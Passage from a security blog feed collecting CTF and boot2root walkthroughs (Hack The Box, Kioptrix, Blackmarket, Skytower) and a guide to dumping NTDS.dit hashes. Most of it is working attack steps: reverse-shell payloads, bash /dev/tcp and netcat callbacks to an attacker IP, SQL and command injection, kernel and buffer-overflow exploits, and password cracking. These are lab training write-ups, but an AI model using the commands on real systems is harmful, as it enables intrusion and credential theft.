Here we have created a new table “Demo” and Add! Filed inside this.

Now create entry in filed 1 as shown.

Let’s create a PHP payload for injecting inside new database. We have use msfvenom command for generating PHP backdoor.

msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.25 lport=4444 -f raw

Now copy the code from * and start multi handler in a new terminal

GO to insert tab and Past above copied code inside the text filed given for Value.

At last you will notice /var/tmp/ ninevehNotes.txt.shell.php is the Path for your database.

If you remember, we had already access admin console and observed a tab for Notes, use it to execute your backdoor.

http://10.10.10.43/department/manage.php?notes=/var/tmp/ninevehNotes.txt.shell.php

Meanwhile, return to the Metasploit terminal and wait for the metepreter session by exploiting multi handler.

msf use exploit/multi/handler

msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp

msf exploit(multi/handler) set lhost 10.10.14.25

msf exploit(multi/handler) set lport 4444

msf exploit(multi/handler) exploit

From given below image you can observe Meterpreter session 1. But the task is not finished yet, still, we need to penetrate more for privilege escalation.

meterpreter > sysinfo

meterpreter > cd /home

meterpreter > ls

meterpreter > cd amrois

meterpreter >ls

meterpreter > cat user.txt

After doing a little bit enumeration we notice a directory report is owned by the user amrois and these reports were being continuously generated by chkrootkit in every minute.

With help of Google we came know that metasploit contains an exploit for chkrootkit exploitation. After enter following command as shown in given image to load exploit/unix/local/chkrootkit module then set session 1and arbitrary lport such as 4545 and run the module.

This will give another session, as you can see we have spawned command shell of target’s machine. Now if you will check uid by typing id it will show uid=0 as root.

cd /root

And to see the list of files in /root type:

ls -lsa

In the list you will see that there is a text file and to read that file type :

cat root.txt

Congrats!! We hit Goal finished both task and at end obtain the root access.

↧

Hack The Kioptrix Level-1 VM

June 27, 2018, 11:40 pm

≫ Next: Hack The Kioptrix Level-2 (Boot2Root Challenge)

≪ Previous: Hack The Box : Nineveh Walkthrough

This Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.

You can Download it from here and run install in your VM.

Table of content

§ Network scaning

§ Enumeration

§ Exploitation

§ Root access

Lets start!!

Turn on your attacking machine and use netdiscover command to scan your local network to get target IP.

So we target at 192.168.1.109 let go for its enumeration and scan open ports and protocols. With help nmap aggressive scan we have observe several open port and service running on it.

nmap -A 192.168.1.109

We also use Nikto for scanning vulnerability with help of following command:

nikto -h http://192.168.1.109

It was very good to see the multiple vulnerability present in this lab.

Since with help of above enumeration it becomes clear that the lab can exploit in multiple therefore without wasting time we execute following command with help of metasploit and try to comprise target’s VM machine.

This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the flaw on x86 Linux systems that do not have the noexec stack option set. NOTE: Some older versions of RedHat do not seem to be vulnerable since they apparently do not allow anonymous access to IPC.

use exploit/linux/samba/trans2open

msf exploit(linux/samba/trans2open) > set rhost 192.168.1.109

msf exploit(linux/samba/trans2open) > set payload linux/x86/shell_reverse_tcp

msf exploit(linux/samba/trans2open) > set lhost 192.168.1.107

msf exploit(linux/samba/trans2open) > exploit

B0000MM!! Here we have command shell of victim’s machine with root access.

↧

Hack The Kioptrix Level-2 (Boot2Root Challenge)

June 27, 2018, 11:51 pm

≫ Next: Hack The Box : October Walkthrough

≪ Previous: Hack The Kioptrix Level-1 VM

You can Download it from here and run install in your VM.

Lets start!!

Turn on your attacking machine and use netdiscover command to scan your local network to get target IP.

So we target at 192.168.1.111 let go for its enumeration and scan open ports and protocols. With help nmap aggressive scan we have observe several open port and service running on it.

nmap -A 192.168.1.111

Since port was 80 open so we explored target IP in the web browser and notice following login page.

URL: http://192.168.1.111

Without wasting time we try following SQL injection in the given going form.

Username: 1' or '1'

Password: 1' or '1'

Great!!! We successfully login into Basic Administrative Web console where we found an empty text field for user input. Whenever I saw such type of scenario, I try to test it against command injection vulnerabilities.

Therefore we submit ;idcommand to enumerate UID and GID of logged user.

As result it dump apache’s UID and GID and hence by this it’s proof that this application is vulnerable to command Injection.

In a new terminal we launch netcat revere connection shell to spawn victim’s tty shell. Then submit following payload as user input inside web application.

127.0.0.1; bash -i >& /dev/tcp/192.168.1.107/8888 0>&1

As soon as above payload will get submitted you get victim’s pty shell through netcat session.

Awesome!! You can see we had access victim’s command shell inside netcat, let’s penetrate it more for root access.

uname -a

Then with help of Google we look for its Kernel exploit for privilege escalation and found Luckily “Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit” hence we can use 9542exploit for privilege escalation.

cd /tmp

wget https://www.exploit-db.com/download/9542 --no-check-certificate

mv 9542 shell.c

gcc shell.c

./a.out

whoami

B0000MM!! Here we have command shell of victim’s machine with root access.

↧

Hack The Box : October Walkthrough

June 29, 2018, 1:14 am

≫ Next: Hack The Blackmarket VM (CTF Challenge)

≪ Previous: Hack The Kioptrix Level-2 (Boot2Root Challenge)

Hello friends!! Today we are going to solve another CTF challenge “October” which is available online for those who want to increase their skill in penetration testing and black box testing. October is retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to Expert level.

Level: Expert

Task: find user.txt and root.txt file on victim’s machine.

Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.16 so let’s begin with nmap port enumeration.

nmap -sV 10.10.10.16

From given below image, you can observe we found port 22 and 80 are open on target system.

As port 80 is running http server we open the target machine’s ip address in our browser, and find that it is running octobercms.

We go to the default admin login page for octobercms at http://10.10.10.16/backend/backend/auth/signin.

We can login to this CMS with default credentials; Username: admin Password: admin

And we got the admin access to October CMS, Now to get reverse shell first rename your php payload to ‘.php5 ‘. We use msfvenom to create a php payload and save it as shell.php5.

msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.25 lport=4444 -f raw > shell.php5

After create the payload we setup our listener using metasploit.

msf > use exploit/multi/handler

msf > exploit(multi/handler) > set payload php/meterpreter/reverse_tcp

msf > exploit(multi/handler) > set lhost 10.10.14.25

msf > exploit(multi/handler) > set lport 4444

msf > exploit(multi/handler) > run

Now click on Media in the top toolbar, now upload your PHP reverse shell, and click on the public link which is on the right side.

As soon as we click on the link we get our revershell. We use sysinfo command to check the system information about the target machine.

Now spawn a tty shell and try to find binaries in the system with suid bit set.

meterpreter > shell

python -c “import pty;pty.spawn(‘/bin/bash’)”

find / -perm -4000 2>/dev/null

We find a binary called ovrflw that has suid bit set. We download the file into our system using meterpreter.

meterpreter > download /usr/local/bin/ovrflw /root/Desktop

We open the file in gdb and take a look at the assembly code. At line main+64 we find the strcpy function, As strcpy is vulnerable to buffer overflow we try to exploit it.

First we create a 150 bytes long string to find the EIP offset using patter_create script.

./pattern_create.rb -l 150

We run the file in gdb along with the 150 byte character as the argument and find that the EIP register was overwritten with 0x64413764.

We pass that into /usr/share/metasploit-framework/tools/pattern_offset.rb, we get an offset of 112. So we need to write 112 characters and then write the address of the instructions we want to be executed.

./pattern_offset.rb -q 64413764 -l 150

Now when we try to insert shellcode into the buffer but we were unable to execute it because of DEP. It prevents code from being executed in the stack. Now we are going to do a ret2libc attack to execute a process already present in the process’ executable memory. We go into the target machine and find ASLR in enabled so we have to brute force the address. Now we find the address of system, exit and /bin/sh.

gdb /usr/local/bin/ovrflw –q

(gdb) b main

(gdb) run

(gdb) p system

(gdb) find 0xb75bd310, +9999999, “/bin/sh”

(gdb) x/s 0xb76dfbac

(gdb) p exit

Now we create our exploit we brute force the address using bash because of ASLR. We align the address in this order: system>exit>/bin/sh. We get the root shell as soon as it matches our memory address.

After getting the root shell, we move to /root directory and find a file called root.txt we open the file and find the first flag.

After finding the first flag we go to /home/ directory, in home directory and find a directory called harry/. We go inside harry directory and find a file called user.txt, we open user.txt and find our final flag.

↧

Hack The Blackmarket VM (CTF Challenge)

June 30, 2018, 12:22 am

≫ Next: 3 Ways to Extracting Password Hashes from NTDS.dit

≪ Previous: Hack The Box : October Walkthrough

BlackMarket VM presented at Brisbane SecTalks BNE0x1B (28th Session) which is focused on students and other InfoSec Professional. This VM has total 6 flags and one r00t flag. Each Flag leads to another Flag and flag format is flag {blahblah}. Download it from here.

VM Difficulty Level: Beginner/Intermediate

Penetrating Methodology

§ Network Scanning (Nmap, netdiscover)

§ Information gathering:

§ Abusing web browser for the 1^st flag

§ Generate dictionary (Cewl)

§ FTP brute-force (hydra)

§ FTP login for the 2^nd flag

§ SQL injection for the 3^rd flag

§ Blackmarket login for the 4^th flag

§ Squirrel mail login for the 5^th flag

§ Get cypher mail from inside Inbox.Draft

§ Decipher the mail and reach to backdoor.php

§ Upload backdoor shell

§ Netcat session for the 6^th flag

§ Import python one-liner for proper TTY shell

§ Sudo Rights Privilege Escalation

§ Get Root access and capture the flag.

Let’s Breach!!!

Let’s start with getting to know the IP of VM (Here, I have it at 192.168.1.104 but you will have to find your own).

netdiscover

Now let’s move towards enumeration in context to identify running services and open of victim’s machine by using the most popular tool Nmap.

nmap -A 192.168.1.104

As you can observe it has dumped a lot of details related to open ports and services running through them.

Knowing port 80 is open in victim’s network I preferred to explore his IP in a browser. It put-up a Blackmarket login page but we don't have credential yet, therefore, we like to view its source code for getting a clue.

BOOOMMM!! Luckily I found the 1^st flag from its source code which was in base64.

flag1 {Q0lBIC0gT3BlcmF0aW9uIFRyZWFkc3RvbmU=}

Since the 1^st flag was the base64 encode so we try to decode it with help of the following syntax.

Syntax: echo ‘base64 encoded text’ | base64 -d

WoW!! It sounds CIA Operation Treadstone…………………

With help of Google I found this link and after reading the whole article it becomes clear to me what CIA Operation Treadstone is all about and why flag 1 has held it secretly. Might be Black-market login credential could be extracted from here, therefore I decide to generate a dictionary with help of ‘Jason Bourne’ movie’s character. By executing the following command, we generated a wordlist for username and password dictionary and save it as dict.txt.

cewl http://bourne.wikia.com/wiki/Operation_Treadstone -d 2 -w /root/Desktop/dict.txt

As we knew port 21 is open FTP, therefore, we use above dictionary for FTP brute-force attack with help of hydra.

hydra -L dict.txt -P dict.txt 192.168.1.104 ftp

Successfully found FTP-login user: nicky password: CIA

Then with help above credential, we logged into FTP and enumerate IMP.txt from inside /IMPFiles and download it with the help of the following command.

ftp 192.168.1.104

ls -al

cd ftp

ls -al

cd IMPFiles

ls -al

get IMP.txt

With help of cat command, we open the IMP.txt file and found flag2 form inside it. Here also we read the given message and analysis the given hint "CIA blackmarket Vehicle workshop”.

cat IMP.txt

flag2 {Q29uZ3JhdHMgUHJvY2VlZCBGdXJ0aGVy}

Looking at above hint I focus on “Vehicle workshop” and start examining the web browser for every possible directory having Vehicle/workshop and UNFORTUNATELY I retrieved following web page when tried http://192.168.1.104/vworkshop.

It was a dashboard of Black-Market Auto Workshop.

After examining the whole dashboard we check-out the Spare Parts and observe its web page and URL. So we decide to use SQLMAP against for SQL injection.

Then execute the following command for fetching its database name with help of sqlmap.

sqlmap -u http://192.168.1.104/vworkshop/sparepartsstoremore.php?sparepartid=1 --dbs --batch

Here I found some database names and as per my consideration, it should be blackmarket therefore without wasting time I step ahead for fetching tables from inside it.

sqlmap -u http://192.168.1.104/vworkshop/sparepartsstoremore.php?sparepartid=1 -D BlackMarket --dump-all --batch

Here I found a table “flag” and capture the 3^rd flag from here.

Flag3 Find Jason Bourne Email access

Then we have fetched table “user” and found usernames with their hash passwords.

With help of the online MD-5 decrypting tool, we decode above-enumerated hashes and found following.

Username: admin|password: cf18233438b9e88937ea0176f1311885 MD5: BigBossCIA

Username: user |password: 0d8d5cd06832b29560745fe4e1b941cf md5 (md5($pass)) : user

Then again we explore target IP in the browser and enter following credential for login.

admin

BigBossCIA

It put-up a pop with flag 4 along with a message as shown.

flag4{bm90aGluZyBpcyBoZXJl}

Jason Bourne Email access ?????

From Inside customers, I got email Id jbourne@cia.gov of user Jason Bourne.

At this stage I felt to use Dirb for directory brute-force attack, here we notice /squirrelmail/ and for sure we will be going to get something from here.

So we explore following URL http://192.168.1.104/squirrelmail/ and enter given below credential as described in the 4^th flag (Jason Bourne Email access ?????)

Username:jbourne@cia.gov

Password: ?????

It gives the following mailbox as shown and I start further enumeration.

Then while inspecting INBOX.Drafts I found the 5^thflag from inside IMPORTANT MESSAGE mail.

Flag5{RXZlcnl0aGluZyBpcyBlbmNyeXB0ZWQ=}

And after reading this we find some encoded text which needs to be decode

Then I decoded the above text as shown and after reading it, I concluded that there should be a “passpass.jpg” under a directory /kgbbackdoor inside Blackmarket workshop which will take us to actual backdoor.

So without wasting time I look for above-said path.

http://192.168.1.104/vworkshop/kgbbackdoor/PassPass.jpg

hhheheyy!!! This image must be hiding something inside, let download it.

Then I use string tool and enter the following command to extract metadata from inside it.

strings PassPass.jpg

Here we found something interesting.

Pass = 5215565757312090656

Since above extract metadata “Pass” which could be the possible password, and we can use this for further approch therefore we try to decode it. As it was in decimal (5215565757312090656)format so first, we decode it into hex (4861696C4B474220) then decode it into ascii and obtained “HailKGB”

As slowly and gradually we are moving towards our goal as it getting more-and-more hectic for me. After penetrating more I reached at following URL where you will found Page Not Found error message…….

http://192.168.1.104/vworkshop/kgbbackdoor/backdoor.php

BANG ON Dear, it is an illusion because at this page you will get a hidden login form as declared in the encrypted mail. Still, if you have any confusion, please read above decoded text message drop for Dimitri one more time, everything will be cleared to you.

B0000MMM!!! Here we have access the backdoor about whom the sender has informed to Dimitri.

Now lets enter attacker IP : 192.168.1.107 and listening port 4444 and then start netcat listen in a new terminal to get victim’s revese connection.

netcat -lvp 4444

With help of netcat we successfully spawn pty shell of victim’s VM machine then open flag.txt with help of cat command and found 6^ththe last flag of this VM. Now we need to get root access to finish this challenge.

cat flag.txt

flag6{Um9vdCB0aW1l}

cd /home

ls -al

cd .Mylife

ls -al

cat .secret

while reading the message I notice something prodigious i.e. DimitriHateApple because the file is named as secret, therefore, I took DimitriHateApple as the password for user: Dimitri

Then I try to login with Dimitri and for that, I execute the following command to access proper terminal.

python -c ‘import pty; pty.spawn(“/bin/bash”)’

su dimitri

DimitryHateApple

Great!!! We login successfully now let’s try privilege escalation for root access.

I was shocked when I checked sudo rights for user Dimitri because I notice ALL Privilege are allotted.

sudo -l

(ALL:ALL) ALL

sudo su

Yehhh!! We own root access.

cd /root

cat THEEND.txt

HURRAYYYY!!!! We finished this challenge.

Happy Hacking

↧

3 Ways to Extracting Password Hashes from NTDS.dit

June 30, 2018, 10:30 am

≫ Next: Hack the Box Challenge: Nibble Walkthrough

≪ Previous: Hack The Blackmarket VM (CTF Challenge)

Hello friends!! Today we are going to discuss some forensic tool which is quite helpful in penetration testing to obtain NTLM password hashes from inside the host machine. As we know while penetration testing we get lots of stuff from inside the host machine and if you found some files like NTDS.ditand system hive then read this article to extract user information from those files.

Impacket-secretsdump

Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. The library provides a set of tools as examples of what can be done within the context of this library.

secretsdump.py: Performs various techniques to dump secrets from the remote machine without executing any agent there. For SAM and LSA Secrets (including cached creds) we try to read as much as we can from the registry and then we save the hives in the target system (%SYSTEMROOT%\Temp directory) and read the rest of the data from there. For DIT files, we dump NTLM hashes, Plaintext credentials (if available) and Kerberos keys using the DL_DRSGetNCChanges() method. It can also dump NTDS.dit via vssadmin executed with the smbexec/wmiexec approach.

Source:https://www.coresecurity.com/corelabs-research/open-source-tools/impacket

As described in its official definition we mainly need two files i.e. ntds.dit& System-hivefor extracting NTLM password from inside it. Suppose while making penetration testing on host machine you found these file mention above then with help of following command you can extract hash password for admin account or for other accounts from inside it.

impacket-secretsdump -system /root/Desktop/NTDS/SYSTEM -ntds /root/Desktop/NTDS/ntds.dit LOCAL

-system: denotes path for system hive files (SYSTEM)

-ntds: denotes path for dit file (ntds.dit)

Now as you can observe it has dumped the NTLM password from inside ntd.dit file……………

With help of the online decrypting tool, we try to crack the password hash and as shown in the given image we got "123@password" from its result.

DSInternals PowerShell

The DSInternals PowerShell Module provides easy-to-use cmdlets that are built on top of the Framework. The main features include offline ntds.dit file manipulation and querying domain controllers through the Directory Replication Service (DRS) Remote Protocol.

Source:https://github.com/MichaelGrafnetter/DSInternals

This method is only applicable for Windows users and to extract NTLM hashes you can take help of following commands as described below.

Save-Module DSInternals -Path C:\Windows\System32\WindowsPowershell\v1.0\Modules

Install-Module DSInternals

Import-Module DSInternals

Get-Bootkey -SystemHivePath 'C:\Users\sanje\Desktop\NTDS\SYSTEM'

Get-ADDBAccount -All -DBPath 'C:\Users\sanje\Desktop\NTDS\ntds.dit' -Bootkey $key

From its result, you can observe that we have successfully extracted the NTLM hash and now you can decrypt it again as done above.

Ntdsxtract

The first step is to extract the tables from the NTDS.dit file, we will use esedbexport by downloading libesedb-tools. Libesedb is a library to access the Extensible Storage Engine (ESE) Database File (EDB) format mainly known for its use in Microsoft Extension for prev1.edb file. The ESE database format is used in many different applications like Windows Search, Windows Mail, Exchange, Active Directory (NTDS.dit) and etc.

Source:https://github.com/libyal/libesedb/

For Latest Download link:https://github.com/libyal/libesedb/releases

Now type the following command to download libesedb library for installing esedbexport then extract the tar file as given below.

wget https://github.com/libyal/libesedb/releases/download/20170121/libesedb-experimental-20170121.tar.gz

tar xf libesedb-experimental-20170121.tar.gz

Now install the requirements with help of following commands:

cd libesedb-20170121

apt-get install autoconf automake autopoint libtool pkg-config

./configure

make

make install

ldconfig

Now the tool is installed, use it to dump the tables from the ntds.dit file.

esedbexport -m tables /root/Desktop/NTDS/ntds.dit

This will make a new directory, named as “ntds.dit.export” with the extracted tables and here you will get two main tables i.e. datatable and link_table.

Now download ntdsxtract which is a forensic tool that is capable of extracting information related to user objects, group objects, computer objects, and deleted objects from NTDS.dit files.

git clone https://github.com/csababarta/ntdsxtract.git

Execute the following command to install all set-up files.

cd ntdsxtract

python setup.py build && python setup.py install

Extracting User Infomation and Password Hash

Now with help of all three files (Datatable, link_table, and system hive) it will be capable to dump user information and NT/LM password hashes. And you can execute the following command for obtaining NTLM password in the format of John the ripper.

dsusers.py ntds.dit.export/datatable.4 ntds.dit.export/link_table.6 data --syshive /root/Desktop/NTDS/SYSTEM --passwordhashes --pwdformat john --ntoutfile nthash.txt --lmoutfile lmhash.txt

As you can see it has extract user information and password hash as said above.

cat data/nthash.txt

So now you can crack this password hash with help of John the ripper.

↧

Hack the Box Challenge: Nibble Walkthrough

July 1, 2018, 11:16 pm

≫ Next: Hack the Box Challenge: Jail Walkthrough

≪ Previous: 3 Ways to Extracting Password Hashes from NTDS.dit

Hello friends!! Today we are going to solve another CTF challenge “Nibble” which is categories as retired lab presented by Hack the Box for making online penetration practices.

Level: Easy

Task: find user.txt and root.txt file on victim’s machine.

Since these labs are online accessible therefore they have static IP. The IP of Nibble is 10.10.10.75 so let’s initiate with nmap port enumeration.

nmap -A 10.10.10.75

As you can see in the given screenshot that we have two services running on our Target Machine, ssh and HTTP on ports 22 and 80 respectively.

The Port 80 is open so let’s open IP in out Browser to see that if a website is hosted on the IP. After opening the IP in the browser, we were greeted by following page.

Then we use curl to send http request on http://10.10.10.75 and notice /nibbleblog/ which could be any web directory.

So we execute the http://10.10.10.75/nibbleblog/ directory put us on the main page of a blogging platform NibbleBlog Yum yum. Without wasting time search for the exploit in the Google and Rapid 7 link for its exploitation.

So we load metasploit framework and executed following command to take meterpreter session of victim’s VM.

According to this module Nibbleblog contains a flaw that allows an authenticated remote attacker to execute arbitrary PHP code. This module was tested on version 4.0.3.

use exploit/multi/http/nibbleblog_file_upload

msf exploit(multi/http/nibbleblog_file_upload) > set rhost 10.10.10.75

msf exploit(multi/http/nibbleblog_file_upload) > set username admin

msf exploit(multi/http/nibbleblog_file_upload) > set password nibble

msf exploit(multi/http/nibbleblog_file_upload) > set targeturi /nibbleblog

msf exploit(multi/http/nibbleblog_file_upload) > exploit

From given below image you can observe meterpreter session1 opened for accessing victim tty shell.

Now let’s finish the task by grabbing user.txt and root.txt file. First I move into /home directory and check available files and directories inside it. I found the 1^st flag “user.txt” from inside /home/nibbler.

cd /home

cd /nibbler

cat user.txt

For spawning proper tty shell of target’s system we need to import python file, therefore, I run following command inside meterpreter shell.

shell

python -c 'import pty;pty.spawn("/bin/bash")'

Inside /nibbler there was a zip file so we try to unzip it with help of following command and after extracting zip file we got a directory “personal”, so we get inside it, then with a little more efforts found a script monitor.sh.

unzip personal.zip

cd personal

cd stuff

ls -al

Then I check sudo rights for user “nibbler” and notice nibbler has sudo permission for script monitor.sh which means he can modify this script

So in a new terminal we generated a payload for netcat shell with help of msfvenom command as shown and copied the highlighted code and start necat listener too.

msfvenom -p cmd/unix/reverse_netcat lhost=10.10.14.25 lport=5555 R

nc -lvp 5555

Then to it exploit it we move inside following Path: /home/nibbler/personal/stuff/ and paste above copied code inside monitor.sh as shown below

cd /home/nibbler/personal/stuff/

echo “mkfifo /tmp/jswwrii; nc 10.10.14.25 5555 0

/tmp/jswwrii 2>&1; rm /tmp/jswwrii” > monitor.sh

Since we knew monitor.sh has full permission, so we can run it to obtain reverse shell along root access.

On other we have netcat listener, which has provided root access to us. Let’s finish this task and grab the root.txt file………………………………..

cd /root

root.txt

cat root.txt

↧

Hack the Box Challenge: Jail Walkthrough

July 3, 2018, 2:47 am

≫ Next: Hack the Skytower (CTF Challenge)

≪ Previous: Hack the Box Challenge: Nibble Walkthrough

Hello friends!! Today we are going to solve another CTF challenge “Jail” which is available online for those who want to increase their skill in penetration testing and black box testing. Jail is retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to Expert level.

Level: Expert

Task: find user.txt and root.txt file on victim’s machine.

Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.34 so let’s begin with nmap port enumeration.

nmap -sV –p- 10.10.10.34 --open

From given below image, you can observe we found port 22 and 80 are open on target system.

As port 80 is running http server we open the target machine’s ip address in our browser, and find an ascii art of prison cell on the webpage.

We run dirbuster on port 80, which reveals a directory entitled jailuser/, with a folder called dev/ inside the directory.

Inside the folder we see three files; a binary file, a c-program, and a bash script.

We open the c-program and find that it is a program for some kind of authentication. We also find that it uses strcpy function for the variable password.

We download the rest of the files, in the bash script there are just a few commands for a service called jail and by checking the jail binary we find that it is an ELF file.

Now we give the binary executable permissions and run the binary.

We check netstat and find that it opens up a port 7411. We check the nmap scan and find that port 7411 is open in the target machine.

Now we open the binary in gdb to look at the assembly code. The binary works by forking itself to each server call, so in the event of a crash the primary process will still run. We use the command below in gdb to make the process debug in forked process.

gdb -q jail

(gdb) set follow-fork-mode child

(gdb) set detach-on-fork off

(gdb) run

First we create a 50 bytes long string to find the EIP offset using patter_create script.

./pattern_create –l 50

Now we connect to the binary running on our system using netcat. We check the c program we found earlier to find the functions we need to use.

We know from the c-program that there is a strcpy function that copies the content of a variable called password to a variable called username. Now we use the pattern we created earlier and send it as password variable. We use the DEBUG function of the binary to get the address of the stack pointer.

nc localhost 7411

USER admin

DEBUG

PASS {pattern}

As soon as we pass the string we get a segmentation fault and find that the EIP register was overwritten with 0x62413961.

We pass that into /usr/share/metasploit-framework/tools/pattern_offset.rb, we get an offset of28. So we need to write 28 characters and then write the address of the instructions we want to be executed.

./pattern_offset.rb -q 62413961 -l 50

The off-set is 28 now we can proceed to create our python exploit using the available data to gain a shell. You can download the exploit used in the machine from here. After running the exploit we get a shell as user “nobody”.

Now for privilege escalation, we know that the machine is running NFS share we try to exploit it. We first find the shared folders of the target machine.

showmount -e 10.10.10.34

After finding the shared folders we mount them locally. After mounting the shared folder we find that only root user has read, write and execute permissions but a user with GID 1000 can write and execute files inside the folder.

So we create a user with GID 1000, so that we can upload our shell to exploit this weak permission vulnerability.

We login as user frank and create a c-program inside the shared folder that can set the real and effective user id to be 1000 of the calling the process.

Then we compile the program set the suid bit, so that we can spawn a shell with EUID 1000.

Now we go back to our reverse shell and run the binary that we just created. As soon as we run binary we spawn a shell as user “frank”.

We spawn a TTY shell and take a look at the sudoers list. We find that we can open jail.c file in /var/www/html/jailuser with rvim as user adm with no password.

python -c “import pty;pty.spawn(‘/bin/bash’)”

sudo -l

Before running the command we find in the sudoers list, first we go to /home/frank directory and find a file called “user.txt”. We take a look at the content of the file and find our first flag.

Now we run the 2^nd command we find in the sudoers list. Now we use rvim to spawn a shell, as rvim is running as user adm when we spawn a shell we will get a shell as user adm.

Inside adm’s home directory we find a hidden folder called “.keys”. We go inside the directory and find one rar file called “keys.rar”, and one text file called “note.txt”.

We take a look at the content of note.txt file and find a hint for a password that states that the password would be user Frank’s last name followed by 4 digits and a symbol.

Now when we try to look for hidden directories, we find another folder called “.local”, we go inside that directory and find a hidden file called “.frank”.

We open the file and find it that the content of the file is encrypted.

We use the site https://quipqiup.com and find the decrypted text; it was related to someone escaping Alcatraz.

Now we want to send keys.rar file from the target machine to our system. We first convert the content of keys.rar to base64 enoding, so that there are no bad characters.

Now we recreate the file by decoding the string in our local system.

When we try to extract the rar file we are asked for a password.

unrar x keys.rar

Now from the earlier hint we try to google search “frank Alcatraz” and find that there was a guy called Frank Miller who escaped Alcatraz prison in 1962.

We know that there was a message from the administrator to frank that his password is his last name followed by 4 digits and 1 symbol. We use crunch to create a dictionary with this information, we assume the number to be 1962 as it was the year Frank Miller escaped and it fits the 4 digit number in his password.

crunch 11 11 -o jail-wlist -f /usr/share/crunch/charset.lst symbols-all -t Morris1962@

After creating a wordlist, we use rar2john utility to convert keys.rar into a format suitable for use with john the ripper.

rar2john keys.rar > jail

We find the password to “Morris1962!” after we ran john the ripper to find the password for the rar file using the word list we created using crunch.

Now we extract the file using the password we find earlier and find a public key.

We use rsactftool to convert the public key into private key so that we can use this to login through ssh. After getting the private key; we change the permission of the private key to read write for owner only. You can download the RsaCtfTool here.

python RsaCtfTool.py --publickey /root/rootauthorizedsshkey.pub –private > /root/id_rsa

We use the ssh private key to login into the target machine; once we connected through ssh we were login as root user we check the content for home directory of root and find a file called “root.txt”. We check inside the file and find our second and final flag.

ssh -i id_rsa 10.10.10.34

↧

Hack the Skytower (CTF Challenge)

July 7, 2018, 10:02 pm

≫ Next: Hack the Box Challenge: PinkyPalace Walkthrough

≪ Previous: Hack the Box Challenge: Jail Walkthrough

Hello everyone. Today we’ll be walking through skytower CTF challenge. This CTF was designed by Telspace Systems for the CTF at the ITWeb Security Summit and BSidesCPT (Cape Town). The aim is to test intermediate to advanced security enthusiasts in their ability to attack a system using a multi-faceted approach and obtain the "flag".

Level: Easy

Aim: find flag.txt in victim’s PC and obtain the root password.

Let’s go then!

Download the skytower lab from here.

Once downloaded, let us run netdiscovercommand on our terminal to find out the IP address. By this method we found out that the IP address of the vulnerable lab is 192.168.1.123 since I am running it on local network.

Now let’s move towards enumeration in context to identify running services and open of victim’s machine by using the most popular tool Nmap.

nmap -A 192.168.1.123

By this scan we found that port 80 is open so it must have a webpage associated with it.

There is also an SSH port and a proxy port too but let’s focus on webpage first. A login form opened up when I typed in the IP in address bar of my browser that requires email ID and password to login.

Let’s try by typing :

Email: ‘*’

Password: ‘*’

Voila! Our blind SQLinjection worked here and the SSH account details were given to us on the login.php page.

Now, we could have tried connecting to it via normal SSH but the problem is that the SSH is filtered.

And since, we are seeing a proxy on port 3128, let’s try and route our SSH connection through the proxy server.

Type gedit /etc/proxychains.conf and add this statement in the end:

http 192.168.1.123 3128

save and exit the config file. On a new terminal window, let’s try SSH connection via that proxy.

proxychains ssh john@192.168.1.123

As we can see, it immediately closed the connection upon us when we typed in the username as john and password as hereisjohn.

So, that gives us an idea that we won’t get a shell. Let’s try suffixing /bin/bash with the ssh command only

proxychains ssh john@192.168.1.123/bin/bash

Voila! It did the trick. Type id to check the priviledges.

Now, let’s check the current directory and the elements in it by:

pwd

ls –la

We can see a bashrc file. Probably this is the file that is causing trouble in giving a shell. Let’s remove this file by:

rm .bashrc

With .bashrc gone, let’s try SSHing once more.

Perfect! It did give us a proper shell. Let’s type in sudo –l to check sudoers list but as you can see, john is not in the sudoers list. And we don’t know any other user too!

Let’s type netstat –antp and hope there is some service that would allow us to look for any other user.

Port 3306 is listening which means mysql database would have the info of some other users for sure!

But the problem is that we don’t have the database name and the login details.

Remember that we have an SQL error on page 192.168.1.123/login.php maybe if we read its source code, we could find the database name and the login credentials.

Let’s read it by:

cat /var/www/login.php

We can see that the database name is “SkyTech,” the username and password both are “root.”

mysql –u root –p root

Here, we run:

show tables;

We have a table called login.

select * from login;

Following database appeared:

Id email password

1	john@skytech.com	hereisjohn
2	sara@skytech.com	ihatethisjob
3	william@skytech.com	senseable

So, let’s try logging in via ssh as the user sara.

ssh sara@localhost –t /bin/bash

Type in the password as: ihatethisjob

sudo –l

Now, we have a clear list of sudoers.

We finally have a directory with no password required. So, let’s try and check the contents in the directory /accounts.

We type sudo ls /accounts/../../../root

And a file called “flag.txt” appears!

sudo cat /accounts/../../../root/flag.txt to read the flag.txt file and we get the root password!

Congrats! We solved the Skytower CTF challenge!

↧

Hack the Box Challenge: PinkyPalace Walkthrough

July 9, 2018, 8:36 am

≫ Next: Hack the Troll-1 VM (Boot to Root)

≪ Previous: Hack the Skytower (CTF Challenge)

Hello friends! Today we are going to take another boot2root challenge known as PinkyPalace. The credit for making this vm machine goes to “Pink_panther” and it is another boot to root challenge in which our goal is to gain root access to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let’s do an nmap scan for port enumeration.

nmap -sV -p- 192.168.1.137

Nmap scan shows us the following ports are open and the corresponding services are running:

nginx web server on port 8080
a squid proxy on port 31337
a ssh daemon on port 64666

As port 8080 is running nginx, we try to enumerate the webserver but it returns a 403 forbidden code.

Now we know that the target machine is running squid server so we try to parse any request that go through it. We use foxyproxy addon to setup a proxy connection in our browser.

After setting up our proxy we try to open the webserver, we find that the server is probably configured to allow access from localhost. As when we try to access it via server’s IP address we still get a forbidden response.

We enumerate the directories by pivoting our connection through the squid proxy and find a directory called littlesecretes-main/.

